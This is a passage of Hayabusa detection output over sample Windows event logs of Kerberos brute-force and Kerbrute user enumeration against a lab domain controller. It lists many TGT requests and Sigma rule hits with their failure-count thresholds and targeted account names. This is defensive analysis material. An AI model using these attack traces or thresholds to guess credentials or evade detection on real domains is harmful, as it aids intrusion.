timeframe:24h",../hayabusa-rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos3.yml,- +2021-12-02 23:48:16.298 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 
2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:16.308 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test2 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:16.311 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admtest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:16.338 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:16.338 +09:00,-,-,medium,InitAccess : PrivEsc,Disabled Users Failing To Authenticate From Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:16 
TargetUserName:SM_25e3b4425ffd47aab/SM_27d255b6407743b08/SM_957258b5879242afb/SM_374806bcc65140a5a/SM_2f6964c8f421408ab/krbtgt/Guest/administrator/Administrator/SM_6aaeeb113c0c4af3a/SM_b2a35e76f50a4c23a/Test-ADM/SM_8b9faa99d83446d1b/SM_2b6f1a51ac6c41b2a/DefaultAccount/$P51000-50I28MP5JB3E IpAddress:::ffff:10.23.123.11 timeframe:24h,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos2.yml,- +2021-12-02 23:48:16.342 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:16.956 +09:00,-,-,medium,InitAccess : PrivEsc,Valid Users Failing to Authenticate From Single Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:22 TargetUserName:HealthMailbox2cfa5bd/svc_adfs01/HealthMailboxf7e4358/HealthMailboxeb3dc3f/proabcdef/domadm/HealthMailboxebdc745/HealthMailboxa935ecd/vuln_scan/HealthMailboxf49e2c8/svc-ata/Svc-SQL-DB01/HealthMailboxa99e1bd/admin-te/svc_nxlog/HealthMailboxdabf0a3/HealthMailboxe8b0d98/adminupn42/HealthMailbox9a2d0da/HealthMailboxc9291f7/HealthMailbox0ab31b3/admin-hacker IpAddress:::ffff:10.23.123.11 timeframe:24h,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos.yml,- +2021-12-02 23:48:17.267 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sgfg | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 
23:48:17.271 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: g | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.274 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dyfgdhbn | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.277 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xvtrz | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.281 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ar | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.284 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tary | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: 
-,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.287 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bsfin | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.319 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: mgdi | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.323 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vdr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.327 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.331 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT 
Requested,User: syvsdy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.334 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: s | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.337 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ysy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.341 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vrat | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.344 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce 
with non existing users.evtx +2021-12-02 23:48:17.348 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.351 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: uydzry | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.354 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.357 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vase | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.360 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ryver | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: 
-,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.363 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvsyv | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.367 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: srey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.370 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: b aer | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.373 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvas | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.376 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos 
TGT Requested,User: tbyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.379 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nini | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.382 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ugu | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.385 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,"User: m,og | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -",../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.389 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: go | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos 
brutforce with non existing users.evtx +2021-12-02 23:48:17.392 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nd | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.395 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bdcy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.398 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rec | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.401 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.405 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: accrt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: 
-,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.408 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: wyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.410 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.413 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.416 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ytuntsr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.420 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT 
Requested,User: vga | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.423 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tfay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.426 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sef | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.430 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: gsdf | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 23:48:17.433 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sfs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce 
with non existing users.evtx +2021-12-02 23:48:23.180 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: HealthMailboxf49e2c8 | Svc: krbtgt | IP Addr: ::ffff:10.23.42.16 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-03 21:06:03.488 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:03.493 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Guest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:03.497 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: DefaultAccount | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:03.510 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: krbtgt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: 
-,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:03.847 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:04.904 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Test-ADM | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:04.910 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:06.986 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: $P51000-50I28MP5JB3E | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.006 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: 
